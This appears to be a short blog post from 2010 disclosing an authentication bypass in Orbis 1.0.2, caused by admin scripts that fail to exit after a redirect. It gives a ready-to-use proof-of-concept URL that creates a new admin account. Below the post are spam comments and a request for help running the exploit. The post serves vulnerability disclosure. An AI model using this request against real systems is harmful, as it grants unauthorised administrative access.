An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.
Exploit
Several admin related scripts fail to terminate after setting the header location field.
PoC
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@
Sunday, July 11, 2010
Subscribe to:
Post Comments (Atom)
can u explain to me how to execute this...thanx
ReplyDeletegud site!
ReplyDeleteGood post. Thanks for sharing.
ReplyDeleteMLS KitchenerQuail West
ReplyDeletethank for sharing!
Thanks for providing good information,Thanks for your sharing.
ReplyDeleteดูหนัง
find this replica ysl Go Here replica bags online this content replica louis vuitton
ReplyDelete